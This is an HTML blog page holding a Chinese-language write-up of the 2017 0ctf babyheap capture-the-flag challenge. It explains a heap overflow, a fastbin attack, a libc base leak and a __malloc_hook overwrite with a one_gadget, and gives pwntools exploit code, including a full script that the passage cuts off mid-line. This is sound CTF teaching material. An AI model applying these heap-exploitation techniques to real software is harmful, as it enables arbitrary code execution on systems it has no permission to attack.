<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="这道题是fastbin_attack经典题，也是我认为有一定难度的题，有两种解法，这里只详细记录了一种，主要知识点有  fastbin_attack libc基地址泄露 __malloc_hook size错位构造">
<meta property="og:type" content="article">
<meta property="og:title" content="Fastbin Attack之2017 0ctf babyheap">
<meta property="og:url" content="http://example.com/2021/04/03/2017%200ctf%20babyheap%20WriteUp/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="这道题是fastbin_attack经典题，也是我认为有一定难度的题，有两种解法，这里只详细记录了一种，主要知识点有  fastbin_attack libc基地址泄露 __malloc_hook size错位构造">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2021/04/02/EqWyOHQVic1zg5X.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/lmrWsDn3VGzf7pS.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/s1w3n9NECGo4SiH.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/c1bA6NgZzIHBymX.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/vg4JdRtiCoQ1ruG.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/bOjfWtH91qnoLzX.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/28a7Yyo9SqFPbjh.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/tzZkic5bHaQDBT9.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/OBscS3w59PyAdLT.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/YuLx9dwrFTRkyUE.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/lU3TYQRXuEV2oIa.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/piN2moHy8xgAOLS.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/ZlwpfiGo1WADa7r.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/qIWQoNVhr1gYtmO.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/yYqVmX7AB6PvNR1.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/hSY1L9AEifvgDkF.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/PZe329FhGdEMYoj.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/vOUiJ2coFfE3uk8.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/ZmeLt8C79yWsK65.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/JM321x6KsGZNSY8.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/l79YXkywmgFhbIH.png">
<meta property="og:image" content="https://i.loli.net/2021/04/02/U8LHXI5bpcwAg3O.png">
<meta property="article:published_time" content="2021-04-02T17:15:25.000Z">
<meta property="article:modified_time" content="2021-04-02T18:07:29.950Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="堆">
<meta property="article:tag" content="fastbin_attack">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/04/02/EqWyOHQVic1zg5X.png">

<link rel="canonical" href="http://example.com/2021/04/03/2017%200ctf%20babyheap%20WriteUp/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Fastbin Attack之2017 0ctf babyheap | Hexo</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Hexo</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/04/03/2017%200ctf%20babyheap%20WriteUp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Fastbin Attack之2017 0ctf babyheap
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-04-03 01:15:25 / 修改时间：02:07:29" itemprop="dateCreated datePublished" datetime="2021-04-03T01:15:25+08:00">2021-04-03</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E4%BA%8C%E8%BF%9B%E5%88%B6%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">二进制安全</span></a>
                </span>
            </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>7.2k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>7 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>这道题是fastbin_attack经典题，也是我认为有一定难度的题，有两种解法，这里只详细记录了一种，主要知识点有</p>
<ul>
<li>fastbin_attack</li>
<li>libc基地址泄露</li>
<li>__malloc_hook</li>
<li>size错位构造<span id="more"></span></li>
</ul>
<p><a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/heap/fastbin-attack/2017_0ctf_babyheap">题目链接</a></p>
<h3 id="一、逆向分析"><a href="#一、逆向分析" class="headerlink" title="一、逆向分析"></a>一、逆向分析</h3><p>检查保护措施：64位程序，保护全开</p>
<img src="https://i.loli.net/2021/04/02/EqWyOHQVic1zg5X.png" style="zoom:80%;" />

<h4 id="main函数"><a href="#main函数" class="headerlink" title="main函数"></a>main函数</h4><p>程序通过sub_B70()函数获取一段连续的存储堆分配索引表的空间</p>
<img src="https://i.loli.net/2021/04/02/lmrWsDn3VGzf7pS.png" style="zoom:80%;" />

<h4 id="allocate函数"><a href="#allocate函数" class="headerlink" title="allocate函数"></a>allocate函数</h4><p>根据用户输入分配堆空间，地址存储到索引表中，一块索引的信息是24字节，第一个8字节记录此索引是否被使用，第二个8字节代表分配的大小，第三个8字节是分配的地址，指向chunk</p>
<p>这里分配内存使用calloc，会将内存置0</p>
<img src="https://i.loli.net/2021/04/02/s1w3n9NECGo4SiH.png" style="zoom:80%;" />

<img src="https://i.loli.net/2021/04/02/c1bA6NgZzIHBymX.png" style="zoom:80%;" />

<h4 id="Fill函数"><a href="#Fill函数" class="headerlink" title="Fill函数"></a>Fill函数</h4><p>没有对用户输入的size过滤，存在堆溢出漏洞</p>
<img src="https://i.loli.net/2021/04/02/vg4JdRtiCoQ1ruG.png" style="zoom:80%;" />

<h4 id="Free函数和Dump函数"><a href="#Free函数和Dump函数" class="headerlink" title="Free函数和Dump函数"></a>Free函数和Dump函数</h4><p>Free函数释放内存空间，同时将索引表中指针置0，不存在uaf漏洞</p>
<p>dump 就是输出对应索引 chunk 的内容，注意读取内容的大小实在索引表中的记录的大小，也就是一开始分配的大小，不是chunk的size字段大小</p>
<h3 id="二、漏洞利用"><a href="#二、漏洞利用" class="headerlink" title="二、漏洞利用"></a>二、漏洞利用</h3><p>思路：存在任意长度堆溢出，首先泄露libc基地址，通过fastbin_attack篡改一个函数指针，调用这个函数获取shell</p>
<h4 id="泄露libc基地址"><a href="#泄露libc基地址" class="headerlink" title="泄露libc基地址"></a>泄露libc基地址</h4><p>free掉一个chunk到bin中，通过泄露fd和bk指针获取main_arena地址计算出libc_base，fastbin_chunk单向链表只有一个指针fd指向链尾，而main_arena的地址在表头，fastbin的fd指针不会指向main_arena，需有bk指针才能指向表头，所以需要一个双向链表的结构：unsorted_bin</p>
<p>泄露条件：</p>
<ul>
<li><p>使用dump函数读取chunk中的fd和bk指针，读取的chunk必须已经分配</p>
</li>
<li><p>分配内存时使用calloc函数，会将chunk置空，fd和bk也被置空，这与上一条矛盾，因此calloc的chunk不能与free的chunk相同，这就需要使用堆溢出欺骗内存</p>
</li>
</ul>
<p>思路一：使用chunk_extend扩展一个堆，使其与free_chunk重叠，读取扩展的chunk获取free_chunk的fd和bk指针。<del>但是读取的大小的内存在分配的时候已经固定，不能扩大，意味着扩展的内容无法读取此路不通！</del>  这是另一种方法，见文章解法二</p>
<p>思路二：fastbin_attack，欺骗fast_bin的指针指向同一个已经calloc的chunk，再次calloc这个内存，使得一张索引表里有两个指针指向同一个chunk，只需要将一个free掉，令一个dump读取fd和bk指针即可。注意：分配的chunk是fastbin，free的必须为unsorted_bin</p>
<h5 id="Fastbin-Attack"><a href="#Fastbin-Attack" class="headerlink" title="Fastbin Attack"></a>Fastbin Attack</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">alloc(<span class="number">0x10</span>) <span class="comment">#index 0</span></span><br><span class="line">alloc(<span class="number">0x10</span>) <span class="comment">#index 1</span></span><br><span class="line">alloc(<span class="number">0x10</span>) <span class="comment">#indec 2</span></span><br><span class="line">alloc(<span class="number">0x80</span>) <span class="comment">#index 3 分配unsorted_bin</span></span><br><span class="line"></span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line"><span class="comment">#fastbin_attack</span></span><br><span class="line">extend_0 = flat(cyclic(<span class="number">0x10</span>), <span class="number">0</span>, <span class="number">0x21</span>, <span class="string">b&#x27;\x60&#x27;</span>)</span><br><span class="line">fill(<span class="number">0</span>, <span class="built_in">len</span>(extend_0), extend_0)</span><br></pre></td></tr></table></figure>

<p>申请3个chunk和1个大小不属于fastbin 的chunk，释放index1和index2</p>
<img src="https://i.loli.net/2021/04/02/bOjfWtH91qnoLzX.png" style="zoom:80%;" />

<p>堆溢出之后，在fastbin中 index1_chunk的fd指针原本指向index2_chunk，改成指向index3_chunk</p>
<img src="https://i.loli.net/2021/04/02/28a7Yyo9SqFPbjh.png" style="zoom:80%;" />

<img src="https://i.loli.net/2021/04/02/tzZkic5bHaQDBT9.png" style="zoom:80%;" />

<p>下一步将要分配fastbin中的两个chunk，第二个申请到的就是指向index3_chunk，使得索引表中index2_chunk指向index3_chunk。</p>
<p>fastbin绕过size检查：fastbin表中每一条链中chunk是固定大小，从表中malloc出一个chunk，拆卸前会检查size大小是否属于当前链中，不属于则报错。fastbin_attack时需要在拆卸前将chunk大小改为当前链的大小，绕过size检测</p>
<p>当我需要通过index2_chunk溢出到index3_chunk的size字段时，原本的index2_chunk释放之后没有分配不能写入数据，所以重新构造chunk，在index3_chunk之前多分配一个0x10的chunk，用于溢出，示意图如下</p>
<img src="https://i.loli.net/2021/04/02/OBscS3w59PyAdLT.png" style="zoom: 80%;" />

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">alloc(<span class="number">0x10</span>) <span class="comment">#index 0 to fastbin</span></span><br><span class="line">alloc(<span class="number">0x10</span>) <span class="comment">#index 1 to fastbin</span></span><br><span class="line">alloc(<span class="number">0x10</span>) <span class="comment">#index 2 to fastbin</span></span><br><span class="line">alloc(<span class="number">0x10</span>) <span class="comment">#index 3 to fastbin &lt;-------新增加的chunk</span></span><br><span class="line">alloc(<span class="number">0x80</span>) <span class="comment">#index 4 to unsorted_bin</span></span><br><span class="line"></span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">extend_0 = flat(cyclic(<span class="number">0x10</span>), <span class="number">0</span>, <span class="number">0x21</span>, <span class="string">b&#x27;\x80&#x27;</span>)</span><br><span class="line">fill(<span class="number">0</span>, <span class="built_in">len</span>(extend_0), extend_0)</span><br><span class="line"><span class="comment">#修改为fastbins大小，用于分配</span></span><br><span class="line">extend_3 = flat(cyclic(<span class="number">0x10</span>), <span class="number">0</span>, <span class="number">0x21</span>)</span><br><span class="line">fill(<span class="number">3</span>, <span class="built_in">len</span>(extend_3), extend_3)</span><br><span class="line"></span><br><span class="line">alloc(<span class="number">0x10</span>)</span><br><span class="line">alloc(<span class="number">0x10</span>)</span><br></pre></td></tr></table></figure>

<p>新分配之后index2_chunk和index4_chunk指向0x90的chunk</p>
<img src="https://i.loli.net/2021/04/02/YuLx9dwrFTRkyUE.png" style="zoom:80%;" />

<p>索引表已经存在两个指针指向0x90的chunk，那么到了泄露地址最后一步，free掉index4_chunk使其进入unsorted_bin，读取index2获得index4的fd和bk指针，获取main_arena的地址</p>
<p>细节：将index4_chunk大小更改回到0x91，free掉index4之前为了防止其与top_chunk合并，需要新分配一个任意大小的chunk</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#修改回fastbins大小，用于释放到unsorted_bin</span></span><br><span class="line">extend_3 = flat(cyclic(<span class="number">0x10</span>), <span class="number">0</span>, <span class="number">0x91</span>)</span><br><span class="line">fill(<span class="number">3</span>, <span class="built_in">len</span>(extend_3), extend_3)</span><br><span class="line"><span class="comment">#分配一个chunk防止unsorted_chunk与top_chunk合并</span></span><br><span class="line">alloc(<span class="number">0x60</span>)</span><br><span class="line">free(<span class="number">4</span>)</span><br><span class="line">dump(<span class="number">2</span>)</span><br><span class="line">io.recvuntil(<span class="string">&quot;Content: \n&quot;</span>)</span><br><span class="line">unsorted_main_arena = u64(io.recv(<span class="number">8</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(unsorted_main_arena))</span><br></pre></td></tr></table></figure>

<p>在64位系统中unsorted_bin在main_arena+88的位置，32位为main_arena+48</p>
<blockquote>
<p>这个通过free一个0x90大小chunk到unsorted_bin中，查看fd和bk指针可以看到</p>
</blockquote>
<p>main_arena在glibc_2.23的0x3c4b20地址：使用IDA打开glibc_2.23的malloc_trim()函数，main_arena存储在glibc_2.23的.data段</p>
<img src="https://i.loli.net/2021/04/02/lU3TYQRXuEV2oIa.png" style="zoom:80%;" />

<p>对照glibc_2.23源码</p>
<img src="https://i.loli.net/2021/04/02/piN2moHy8xgAOLS.png" style="zoom:80%;" />

<p>libc基地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">main_arena = <span class="number">0x3c4b20</span></span><br><span class="line">libc_base = unsorted_main_arena - (main_arena + <span class="number">88</span>)</span><br><span class="line">log.success(<span class="string">&quot;libc base addr: &quot;</span> + <span class="built_in">hex</span>(libc_base))</span><br></pre></td></tr></table></figure>

<img src="https://i.loli.net/2021/04/02/ZlwpfiGo1WADa7r.png" style="zoom:80%;" />

<h4 id="hook劫持"><a href="#hook劫持" class="headerlink" title="hook劫持"></a>hook劫持</h4><p>往常通过fastbin attack进行got表劫持，这里有两点限制got劫持：</p>
<ul>
<li><p>RELRO全开，将GOT表属性设置为不可写</p>
</li>
<li><p>fastbin如果指向got表，为了通过size校验需要有一个合适的size字段，但是got表中难以找到</p>
</li>
</ul>
<p>这里我们选择hook劫持：</p>
<blockquote>
<p>hook是钩子函数，设计钩子函数的初衷是用于调试，基本格式大体是func_hook(*func,&lt;参数&gt;)，在调用某函数时，如果函数的钩子存在，就会先去执行该函数的钩子函数，通过钩子函数再来回调我们当初要调用的函数，calloc函数与malloc函数的钩子都是malloc_hook</p>
</blockquote>
<p>glibc_2.23中malloc实现</p>
<img src="https://i.loli.net/2021/04/02/qIWQoNVhr1gYtmO.png" style="zoom:80%;" />

<img src="https://i.loli.net/2021/04/02/yYqVmX7AB6PvNR1.png" style="zoom:80%;" />

<p>calloc中也都存在malloc_hook函数判断执行，所以调用malloc/calloc函数是都会先判断hook函数是否存在，存在则先调用malloc_hook</p>
<p>为了实现fastbin_attack，是fd指针指向__malloc_hook，需要在附近在其低地址找到合法的size段绕过安全检测，先来查看 _malloc_hook附近的布局</p>
<img src="https://i.loli.net/2021/04/02/hSY1L9AEifvgDkF.png"  />

<img src="https://i.loli.net/2021/04/02/PZe329FhGdEMYoj.png" style="zoom:80%;" />

<img src="https://i.loli.net/2021/04/02/vOUiJ2coFfE3uk8.png" style="zoom:80%;" />

<p>在3C4AF0到3C4B10直接寻找size字段：</p>
<p>因为在64位系统中，地址8字节只使用了低6字节，而且hook函数和_IO_wfile_jumps的偏移地址最高位0x7F，align 20h为0，可以错位构造size：0x3C4AF0为 ? ? ? ? ? 7F 00 00  而 0x3C4AF8 00 00 00 00 00，选择0x3C4AF5~0x3C4AFC：7F 00 00 00 00 00 00 00，对应需要分配的chunk大小位0x60</p>
<img src="https://i.loli.net/2021/04/02/ZmeLt8C79yWsK65.png" style="zoom:80%;" />

<p>之前已经将index4_chunk 释放进unsorted_bin，再次分配0x60可以切割index4_chunk，由0x90成0x60，在free进unsorted_bin，构造0x60的unsorted_bin的链</p>
<p>index2也指向index4_chunk，通过修改index2内容将index4_chunk的 fd 指向__malloc_hook的伪造chunk地址（计算偏移），再次分配两次，一次获得index4_chunk，另一次指向 malloc_hook</p>
<img src="https://i.loli.net/2021/04/02/JM321x6KsGZNSY8.png" style="zoom:80%;" />

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">hook_addr = libc_base + libc.sym[<span class="string">&quot;__malloc_hook&quot;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(hook_addr))</span><br><span class="line"><span class="comment">#构造0x60 unsorted_bin链</span></span><br><span class="line">alloc(<span class="number">0x60</span>)</span><br><span class="line">free(<span class="number">4</span>) </span><br><span class="line"></span><br><span class="line"><span class="comment">#伪造chunk，指向hook</span></span><br><span class="line">fake_chunk = flat(hook_addr - <span class="number">0x23</span>)</span><br><span class="line">fill(<span class="number">2</span>, <span class="built_in">len</span>(fake_chunk), fake_chunk)</span><br><span class="line">alloc(<span class="number">0x60</span>)</span><br><span class="line">alloc(<span class="number">0x60</span>) <span class="comment">#获取index6指向hook地址</span></span><br></pre></td></tr></table></figure>

<h4 id="One-gadget"><a href="#One-gadget" class="headerlink" title="One_gadget"></a>One_gadget</h4><p>将malloc_hook篡改为onegadget，之后调用calloc即可</p>
<p>获取onegadget，依次尝试</p>
<img src="https://i.loli.net/2021/04/02/l79YXkywmgFhbIH.png" style="zoom:80%;" />

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">one_gadget_addr = libc_base + <span class="number">0x4527a</span></span><br><span class="line"><span class="comment">#篡改__malloc_hook</span></span><br><span class="line">payload = flat(cyclic(<span class="number">0x13</span>), one_gadget_addr)</span><br><span class="line">fill(<span class="number">6</span>, <span class="built_in">len</span>(payload), payload)</span><br><span class="line"><span class="comment">#触发calloc</span></span><br><span class="line">alloc(<span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h4 id="完整exploit"><a href="#完整exploit" class="headerlink" title="完整exploit"></a>完整exploit</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch=<span class="string">&quot;amd64&quot;</span>, log_level=<span class="string">&quot;debug&quot;</span>, os=<span class="string">&quot;linux&quot;</span>)</span><br><span class="line"></span><br><span class="line">io = process(<span class="string">&quot;./babyheap&quot;</span>)</span><br><span class="line">elf = ELF(<span class="string">&quot;./babyheap&quot;</span>)</span><br><span class="line">libc = ELF(<span class="string">&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">alloc</span>(<span class="params">size</span>):</span></span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Command: &quot;</span>, <span class="string">&quot;1&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Size: &quot;</span>,<span class="built_in">str</span>(size))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">fill</span>(<span class="params">index, size, content</span>):</span></span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Command: &quot;</span>, <span class="string">&quot;2&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Index: &quot;</span>, <span class="built_in">str</span>(index))</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Size: &quot;</span>,<span class="built_in">str</span>(size))</span><br><span class="line">    io.sendafter(<span class="string">&quot;Content: &quot;</span>, content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Command: &quot;</span>, <span class="string">&quot;3&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Index: &quot;</span>, <span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dump</span>(<span class="params">index</span>):</span></span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Command: &quot;</span>, <span class="string">&quot;4&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Index: &quot;</span>, <span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">alloc(<span class="number">0x10</span>) <span class="comment">#index 0 to fastbin</span></span><br><span class="line">alloc(<span class="number">0x10</span>) <span class="comment">#index 1 to fastbin</span></span><br><span class="line">alloc(<span class="number">0x10</span>) <span class="comment">#index 2 to fastbin</span></span><br><span class="line">alloc(<span class="number">0x10</span>) <span class="comment">#index 3 to fastbin &lt;-------新增加的chunk</span></span><br><span class="line">alloc(<span class="number">0x80</span>) <span class="comment">#index 4 to unsorted_bin</span></span><br><span class="line"></span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">extend_0 = flat(cyclic(<span class="number">0x10</span>), <span class="number">0</span>, <span class="number">0x21</span>, <span class="string">b&#x27;\x80&#x27;</span>)</span><br><span class="line">fill(<span class="number">0</span>, <span class="built_in">len</span>(extend_0), extend_0)</span><br><span class="line"><span class="comment">#修改为fastbins大小，用于分配</span></span><br><span class="line">extend_3 = flat(cyclic(<span class="number">0x10</span>), <span class="number">0</span>, <span 